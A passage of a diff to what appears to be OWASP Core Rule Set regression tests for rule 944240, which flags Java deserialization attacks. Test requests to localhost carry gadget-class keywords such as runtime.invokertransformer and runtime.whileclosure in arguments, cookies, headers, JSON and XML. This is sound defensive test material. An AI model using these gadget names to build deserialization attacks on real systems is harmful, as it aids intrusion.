"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.invokertransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.invokertransformer" + output: + log: + expect_ids: [944240] + - test_id: 54 desc: "Content-Type application/json arg value includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.invokertransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.invokertransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 55 desc: "Content-Type application/json arg name includes keyword runtime.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.invokertransformer\": 
\"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.invokertransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 56 desc: "Argument test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 57 desc: "Argument name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 
Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory=test" + output: + log: + expect_ids: [944240] + - test_id: 58 desc: "Cookie test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 59 desc: "Cookie name includes keyword 
runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeclonefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeclonefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 60 desc: "Request header test includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeclonefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeclonefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 61 desc: "XML attribute value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 62 desc: "XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 63 desc: "Nested XML element value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 64 desc: "Content-Type text/plain includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeclonefactory" - output: - log_contains: "id \"944240\"" - - 
test_title: 944240-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeclonefactory" + output: + log: + expect_ids: [944240] + - test_id: 65 desc: "Content-Type application/json arg value includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeclonefactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-66 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeclonefactory\"}" + output: + log: + expect_ids: [944240] + - test_id: 66 desc: "Content-Type application/json arg name includes keyword runtime.prototypeclonefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeclonefactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-67 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeclonefactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 67 desc: "Argument test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-68 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 68 desc: "Argument name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-69 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory=test" + output: + log: + expect_ids: [944240] + - test_id: 69 desc: "Cookie test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + 
Cookie: test=runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 70 desc: "Cookie name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.prototypeserializationfactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.prototypeserializationfactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 71 desc: "Request header test includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.prototypeserializationfactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-72 + - 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.prototypeserializationfactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 72 desc: "XML attribute value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-73 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 73 desc: "XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-74 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 74 desc: "Nested XML element value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-75 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 75 desc: "Content-Type text/plain includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.prototypeserializationfactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-76 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.prototypeserializationfactory" + output: + log: + expect_ids: [944240] + - test_id: 76 desc: "Content-Type application/json arg value includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.prototypeserializationfactory\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-77 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.prototypeserializationfactory\"}" + output: + log: + expect_ids: [944240] + - 
test_id: 77 desc: "Content-Type application/json arg name includes keyword runtime.prototypeserializationfactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.prototypeserializationfactory\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-78 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.prototypeserializationfactory\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 78 desc: "Argument test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.whileclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-79 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" 
+ Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.whileclosure" + output: + log: + expect_ids: [944240] + - test_id: 79 desc: "Argument name includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.whileclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-80 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.whileclosure=test" + output: + log: + expect_ids: [944240] + - test_id: 80 desc: "Cookie test includes keyword runtime.whileclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.whileclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-81 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
